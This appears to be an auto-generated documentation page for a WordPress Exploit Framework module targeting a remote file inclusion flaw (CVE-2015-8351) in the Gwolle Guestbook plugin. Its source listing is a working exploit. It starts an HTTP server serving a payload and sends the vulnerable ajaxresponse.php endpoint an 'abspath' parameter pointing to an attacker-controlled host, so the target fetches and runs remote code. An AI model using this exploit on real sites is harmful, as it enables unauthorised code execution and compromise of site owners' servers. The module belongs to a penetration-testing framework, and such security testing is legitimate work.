Class: Wpxf::Exploit::GwolleGuestbookRemoteFileInclusion

Inherits:
Module
  • Object
show all
Includes:
Wpxf, Net::HttpServer
Defined in:
lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeGwolleGuestbookRemoteFileInclusion

Returns a new instance of GwolleGuestbookRemoteFileInclusion.



7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 7

def initialize
  super

  update_info(
    name: 'Gwolle Guestbook Remote File Inclusion',
    desc: 'The Gwolle Guestbook plugin, in versions 1.5.3 and below, '\
          'allows for remote file inclusion and remote code execution. '\
          'This exploit only works when the PHP option "allow_url_include" '\
          'is enabled (disabled by default).',
    author: [
      'High-Tech Bridge Security Research Lab', # Vulnerability disclosure
      'rastating'                               # WPXF module
    ],
    references: [
      ['CVE', '2015-8351'],
      ['EDB', '38861']
    ],
    date: 'Nov 04 2015'
  )

  register_options([
    StringOption.new(
      name: 'rfi_host',
      desc: 'The address of the host listening for a connection',
      required: true
    ),
    StringOption.new(
      name: 'rfi_path',
      desc: 'The path to access via the remote file inclusion request',
      default: Utility::Text.rand_alpha(8),
      required: true
    )
  ])
end

Instance Method Details

#checkObject



46
47
48
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 46

def check
  check_plugin_version_from_readme('gwolle-gb', '1.5.4')
end

#on_http_request(path, params, headers) ⇒ Object



62
63
64
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 62

def on_http_request(path, params, headers)
  payload.encoded
end

#plugin_urlObject



42
43
44
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 42

def plugin_url
  normalize_uri(wordpress_url_plugins, 'gwolle-gb')
end

#rfi_hostObject



50
51
52
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 50

def rfi_host
  normalized_option_value('rfi_host')
end

#rfi_pathObject



54
55
56
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 54

def rfi_path
  normalized_option_value('rfi_path')
end

#rfi_urlObject



58
59
60
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 58

def rfi_url
  "http://#{rfi_host}:#{http_server_bind_port}/#{rfi_path}"
end

#runObject



70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 70

def run
  return false unless super

  start_http_server(true)

  emit_info 'Executing request...'
  res = execute_get_request(
    url: vulnerable_url,
    params: { 'abspath' => rfi_url }
  )
  stop_http_server

  emit_info "Response code: #{res.code}", true
  emit_info "Response body: #{res.body}", true

  if res.body =~ /allow_url_include/
    emit_error 'allow_url_include appears to be disabled'
    return false
  end

  if res && !res.body.strip.empty?
    emit_success "Result: #{res.body}"
  end

  true
end

#vulnerable_urlObject



66
67
68
# File 'lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb', line 66

def vulnerable_url
  normalize_uri(plugin_url, 'frontend', 'captcha', 'ajaxresponse.php')
end